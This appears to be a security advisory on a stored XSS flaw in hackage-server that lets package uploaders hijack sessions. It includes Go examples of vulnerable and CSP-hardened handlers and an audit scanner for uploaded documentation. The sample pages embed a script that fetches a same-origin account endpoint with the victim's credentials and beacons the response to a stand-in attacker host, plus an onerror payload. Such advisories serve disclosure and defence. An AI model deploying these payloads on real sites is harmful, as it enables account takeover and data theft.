Critical (9.9)

Hackage XSS hijacks user sessions (CVE-2026-40470)


Critical CVE-2026-40470 XSS in hackage-server lets attackers hijack authenticated user sessions via malicious package uploads. Update to 2.1.1 or later to block untrusted JavaScript.

Patch now - CVE-2026-40470 is a critical stored XSS in hackage-server prior to version 2.1.1 that lets a malicious package maintainer run arbitrary JavaScript in the browser of any authenticated user who views the attacker's package page or documentation, leading to session hijacking and full account takeover. Upgrade to 2.1.1 or later immediately.

Overview

A critical stored cross-site scripting (XSS) vulnerability in hackage-server and hackage.haskell.org (CVE-2026-40470) allows malicious package maintainers to execute arbitrary JavaScript in the browser of any authenticated user who views their package page or documentation. Because the script runs on the registry's own origin, it can act with the victim's session: any user whose browser still holds valid credentials for hackage.haskell.org (a session cookie or cached HTTP authentication) is exposed to full session hijacking.

Technical Details

The flaw exists because hackage-server serves HTML and JavaScript files from uploaded source packages and documentation exactly as provided, without sanitization and without a Content Security Policy that would stop them from executing. Since these files are served from the main hackage.haskell.org origin rather than a separate sandbox domain, the browser treats them as first-party content with full access to the session context. When an authenticated user views a compromised package page, the attacker's script can read any credential exposed to JavaScript and exfiltrate it; it does not even need to, since any request it issues to the same origin is sent by the browser with the victim's ambient credentials attached. Either way the script can perform any action the victim is authorized to do.
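The serving pattern above, reduced to two HTTP handlers, as an added example that is not hackage-server's own code. The first handler returns an uploaded documentation page byte-for-byte on the registry origin with no isolating headers; the second returns the same bytes under a CSP sandbox so the embedded script never runs and the document gets an opaque origin. The sample page, the `/user/victim/edit` endpoint it targets and the `attacker.example` host are constructed for the example; the CSP value is one hardening choice, not the project's fix.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Constructed sample of an uploaded documentation page carrying attacker script.
// The fetch targets a hypothetical same-origin account endpoint; a browser would
// attach the victim's ambient credentials to that request automatically.
const uploadedDoc = `<!doctype html><html><body>
<h1>Module Docs</h1>
<script>fetch("/user/victim/edit",{credentials:"include"}).then(r=>r.text()).then(t=>navigator.sendBeacon("https://attacker.example/x",t))</script>
</body></html>`

// vulnerableDocs reproduces the pattern the advisory describes: uploaded HTML is
// returned unchanged on the registry's own origin with no isolating headers.
func vulnerableDocs(w http.ResponseWriter, r *http.Request) {
	w.Header().Set("Content-Type", "text/html; charset=utf-8")
	fmt.Fprint(w, uploadedDoc)
}

// hardenedDocs returns the same bytes but instructs the browser to render them in a
// sandboxed, scriptless document with an opaque origin, so nothing in the page can
// run or reach the registry's session context.
func hardenedDocs(w http.ResponseWriter, r *http.Request) {
	h := w.Header()
	h.Set("Content-Type", "text/html; charset=utf-8")
	// sandbox with no allow-* flags: opaque origin, no script, no forms, no top navigation.
	// default-src 'none' backstops script execution independently of sandbox support;
	// inline styles and same-origin images/fonts are allowed so generated docs still render.
	h.Set("Content-Security-Policy",
		"sandbox; default-src 'none'; img-src 'self' data:; style-src 'self' 'unsafe-inline'; font-src 'self'")
	h.Set("X-Content-Type-Options", "nosniff")
	h.Set("Referrer-Policy", "no-referrer")
	fmt.Fprint(w, uploadedDoc)
}

// CSPIsolatesScripts reports whether a policy string stops uploaded content from running
// script on this origin: a sandbox directive with neither allow-scripts nor
// allow-same-origin, or a script-src (falling back to default-src) of exactly 'none'.
func CSPIsolatesScripts(csp string) bool {
	if strings.TrimSpace(csp) == "" {
		return false
	}
	directives := map[string]string{}
	for _, d := range strings.Split(csp, ";") {
		fields := strings.Fields(d)
		if len(fields) == 0 {
			continue
		}
		directives[strings.ToLower(fields[0])] = strings.ToLower(strings.Join(fields[1:], " "))
	}
	if sb, ok := directives["sandbox"]; ok &&
		!strings.Contains(sb, "allow-scripts") && !strings.Contains(sb, "allow-same-origin") {
		return true
	}
	src, ok := directives["script-src"]
	if !ok {
		src, ok = directives["default-src"]
	}
	return ok && src == "'none'"
}

// IsolatesScripts applies CSPIsolatesScripts to a response's headers.
func IsolatesScripts(h http.Header) bool {
	return CSPIsolatesScripts(h.Get("Content-Security-Policy"))
}

// ResponseHeaders serves one documentation request to h in-process and returns the headers.
func ResponseHeaders(h http.HandlerFunc) http.Header {
	rec := httptest.NewRecorder()
	h(rec, httptest.NewRequest(http.MethodGet, "/package/example-1.0/docs/index.html", nil))
	return rec.Result().Header
}

func main() {
	fmt.Println("vulnerable handler isolates scripts:", IsolatesScripts(ResponseHeaders(vulnerableDocs)))
	fmt.Println("hardened handler isolates scripts:  ", IsolatesScripts(ResponseHeaders(hardenedDocs)))
}
```

The `sandbox` directive only takes effect when delivered in the header, not in a `<meta>` tag, which is why the check reads the response headers. A sandbox that grants `allow-scripts` is still rejected: even with an opaque origin, script could fire credentialed cross-origin requests at the registry, so the check demands that script be disabled outright. Serving documentation from a separate origin is the stronger fix; the CSP approach is what a deployment can apply without changing its hostnames.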

Impact

An attacker can:

  • Upload arbitrary packages or documentation under the victim’s identity
  • Modify package metadata, including maintainer lists
  • Amend or delete package ownership
  • Perform any action the victim’s account permits

Because the attack requires nothing of the victim beyond viewing a package page, and the attacker needs only low privileges (any account able to upload a package or its documentation), the CVSS score is 9.9 (Critical).

Affected Versions

All versions of hackage-server prior to 2.1.1. The hackage.haskell.org production instance was also affected.

Remediation

  1. Update hackage-server to 2.1.1 or later, which sanitizes uploaded HTML and JavaScript content and serves it with Content Security Policy headers.
  2. Audit existing packages and documentation for malicious content uploaded before the fix; content already stored is not cleaned by upgrading.
  3. Enable multi-factor authentication (MFA) on all maintainer accounts where your deployment supports it. MFA limits what an attacker can do with stolen credentials; it does not stop actions a script performs from inside an already-authenticated session.
  4. Monitor server access logs for unusual session activity during the exposure window, such as package or maintainer changes made from a session that also fetched another maintainer's documentation moments earlier.
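An added example for the audit in step 2, not tooling from hackage-server: a scanner that walks an extracted documentation tree and reports indicators of active content (inline or unrecognised external scripts, event-handler attributes, `javascript:` URLs, embedding elements and stray `.js` files). Generated Haddock output legitimately references its own bundled scripts, so the scanner takes an allowlist of script file names; the name `quick-jump.min.js`, the sample files and the endpoint in the injected script are constructed for the example, and the allowlist should be taken from a known-good Haddock build rather than from this code.

```go
package main

import (
	"fmt"
	"path"
	"regexp"
	"sort"
	"strings"
)

// Patterns for active content in HTML. Assumption: an illustrative set for triage,
// not hackage-server's own audit rules; expect some false positives and review by hand.
var (
	scriptTag  = regexp.MustCompile(`(?is)<script\b([^>]*)>`)
	srcAttr    = regexp.MustCompile(`(?is)(?:^|\s)src\s*=\s*["']?([^"'\s>]+)`)
	eventAttr  = regexp.MustCompile(`(?is)\son[a-z]+\s*=`)
	jsURL      = regexp.MustCompile(`(?is)\b(?:href|src|action|data)\s*=\s*["']?\s*javascript:`)
	activeElem = regexp.MustCompile(`(?is)<(iframe|object|embed|form|meta\s+http-equiv|base)\b`)
)

// Finding is one indicator located in one file.
type Finding struct {
	File, Kind, Detail string
}

// ScanHTML lists active-content indicators in one document. External scripts whose
// base name is in trusted (assumed allowlist of scripts a known-good Haddock build
// emits) are skipped; everything else is reported.
func ScanHTML(name, body string, trusted map[string]bool) []Finding {
	var out []Finding
	for _, m := range scriptTag.FindAllStringSubmatch(body, -1) {
		detail := "inline"
		if s := srcAttr.FindStringSubmatch(m[1]); s != nil {
			if trusted[path.Base(s[1])] {
				continue
			}
			detail = s[1]
		}
		out = append(out, Finding{File: name, Kind: "script", Detail: detail})
	}
	if n := len(eventAttr.FindAllString(body, -1)); n > 0 {
		out = append(out, Finding{File: name, Kind: "event-handler", Detail: fmt.Sprintf("%d attribute(s)", n)})
	}
	if n := len(jsURL.FindAllString(body, -1)); n > 0 {
		out = append(out, Finding{File: name, Kind: "javascript-url", Detail: fmt.Sprintf("%d occurrence(s)", n)})
	}
	for _, m := range activeElem.FindAllStringSubmatch(body, -1) {
		out = append(out, Finding{File: name, Kind: "active-element", Detail: strings.ToLower(m[1])})
	}
	return out
}

// ScanFiles scans a documentation tree given as path -> contents (constructed in memory
// here; in practice read the unpacked doc tarball). Markup files are scanned; any .js
// file not on the allowlist is itself a finding. Results are ordered by file name.
func ScanFiles(files map[string]string, trusted map[string]bool) []Finding {
	names := make([]string, 0, len(files))
	for n := range files {
		names = append(names, n)
	}
	sort.Strings(names)
	var out []Finding
	for _, n := range names {
		switch strings.ToLower(path.Ext(n)) {
		case ".html", ".htm", ".xhtml", ".svg":
			out = append(out, ScanHTML(n, files[n], trusted)...)
		case ".js":
			if !trusted[path.Base(n)] {
				out = append(out, Finding{File: n, Kind: "script-file", Detail: fmt.Sprintf("%d bytes", len(files[n]))})
			}
		}
	}
	return out
}

// Constructed sample tree: a benign generated index page, a module page with injected
// script, an event handler and a javascript: link, the allowlisted helper, and a stray script.
var sampleDocs = map[string]string{
	"index.html":        `<html><head><script src="quick-jump.min.js"></script></head><body><h1>example-1.0</h1></body></html>`,
	"Data-Example.html": `<html><body><script>fetch("/user/victim/edit",{credentials:"include"})</script><img src=x onerror="alert(1)"><a href="javascript:void(0)">x</a></body></html>`,
	"quick-jump.min.js": `/* bundled helper */`,
	"extra.js":          `document.cookie`,
}

// trustedHaddockScripts is an assumed allowlist; derive the real one from a trusted build.
var trustedHaddockScripts = map[string]bool{"quick-jump.min.js": true}

func main() {
	for _, f := range ScanFiles(sampleDocs, trustedHaddockScripts) {
		fmt.Printf("%-20s %-15s %s\n", f.File, f.Kind, f.Detail)
	}
}
```

Run it over each package's extracted documentation directory and diff the findings against a scan of documentation regenerated from the package source with a trusted Haddock; anything present only in the uploaded copy is what the audit is looking for.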

Workaround

If immediate patching is not possible, temporarily disable the documentation upload facility and restrict package uploads to trusted maintainers only. Where the deployment allows it, serving uploaded documentation from a separate origin, or behind a Content Security Policy that disables script, limits the exposure until the upgrade is in place.

Security Insight

This vulnerability mirrors the classic "trusted domain" XSS pattern: a registry renders maintainer-supplied content on the same origin that carries its users' sessions, and the browser cannot tell the registry's own pages from the uploaded ones. It underscores that package registries must treat every uploaded file as potentially malicious content, even when it arrives through legitimate maintainer channels, and must isolate it by origin or by policy rather than by trusting who uploaded it. The high CVSS score reflects how deeply trust assumptions in software supply chains can be exploited when content origin is confused with content safety.
